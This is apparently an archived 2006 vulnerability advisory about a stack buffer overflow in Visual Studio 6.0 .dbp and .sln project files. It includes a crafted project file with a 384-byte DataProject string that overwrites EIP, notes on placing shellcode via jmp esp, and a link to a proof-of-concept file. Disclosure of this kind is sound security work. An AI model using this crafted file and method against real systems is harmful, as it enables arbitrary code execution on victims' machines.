exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

vs60bo.txt

vs60bo.txt
Posted Mar 6, 2006
Authored by ATmaCA, Kozan | Site spyinstructors.com

A buffer overflow vulnerability exists in the handling of .dbp and .sln files for Visual Studio version 6.0 and Microsoft Development Environment version 6.0.

tags | advisory, overflow
SHA-256 | c470a3d747fd65b82c9b1c8bd186c168a80918821c5b1940eed620042405b6ca

vs60bo.txt

Change Mirror Download
Visual Studio 6.0 Buffer Overflow Vulnerability

Bug Discovered by Kozan
Credits to ATmaCA
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com

Affected Vendor:

Microsoft (www.microsoft.com)


Affected Products:

Microsoft Visual Studio 6.0 (with latest Service Pack 6)
Microsoft Development Environment 6.0 (SP6) (Microsoft Visual InterDev 6.0)


Vulnerability Details:

A Buffer Overflow Vulnerability is exists for the following file formats of affected product.


Visual Studio Database Project File (.dbp)
Visual Studio Solution (.sln)



The vulnerability is caused due to a boundary error within the handling of a ".dbp" file (.sln files are also affected) that contains an overly long string in the "DataProject" field. This can be exploited to cause a stack-based buffer overflow and allows arbitrary code execution when a malicious ".dbp" file is opened.
A specially crafted project file can overwrite a stack based buffer allowing for fully EIP register control and code execution and compromise user's system.



An example .dbp file:

# Microsoft Developer Studio Project File - Database Project
Begin DataProject = "ProjectName"
End


Carriage return and line feed (0x0d and 0x0a) characters and some others (0x00 ...) can not be used in project name variable.


An example .dbp file which overwrites EIP register:

# Microsoft Developer Studio Project File - Database Project
Begin DataProject = "Project1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXX
AAAA123456AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
End

The lenght must be 384 bytes long. Otherwise other registers will be overwriten differently and exploitation method will be chanced. So 384 bytes long length is the most suitable way.

In this example when file is opened:

XXXX (0x58585858) characters will overwrite EIP.
And 123456AAAA... (3132333435364141... in hex) bytes will be on ESP.

So an attacker could create a malicious .dbp project file which includes a payload which on ESP and EIP should point to this shellcode with a loaded moduls jmp esp or call esp opcodes.


PoC:

The local path length of the dbp file changes the arragement of malformed data. So, exploit has to re-align the data for total path length.

Copy the following file as c:\deneme\Project1.dbp

http://www.spyinstructors.com/kozan/poc/vuln.dbp
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close